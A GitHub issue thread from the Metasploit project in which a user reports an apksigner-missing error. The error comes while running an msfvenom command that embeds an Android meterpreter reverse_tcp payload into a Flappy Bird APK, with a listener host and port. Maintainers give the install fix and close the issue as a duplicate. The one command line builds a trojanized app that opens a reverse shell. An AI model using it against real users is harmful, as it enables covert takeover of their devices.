### ISSUE TITLE
im getting this error while executing...

### ISSUE THREAD

**Issue by ArfathKhan786** [rapid7/metasploit-framework#16845] opened 2022-08-01 12:19 UTC
$ msfvenom -x flappy-bird-1-3-en-android.apk -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=5555 -o      flappy_bird_v.apk
Using APK template: flappy-bird-1-3-en-android.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: apksigner not found. If it's not in your PATH, please add it.
Any one there to help me with this?

**Comment by adfoster-r7** [comment] 2022-08-01 12:24
> Error: apksigner not found. If it's not in your PATH, please add it.

You need `apksigner` to be in your system path.

It is possible that you have not installed `apksigner`. On Kali, you can install `apksigner` with `apt-get install apksigner`.

**Comment by bcoles** [comment] 2022-08-01 12:42
Dupe of #16452.

**Closed by bcoles** 2022-08-01 12:42 UTC
Labels: question
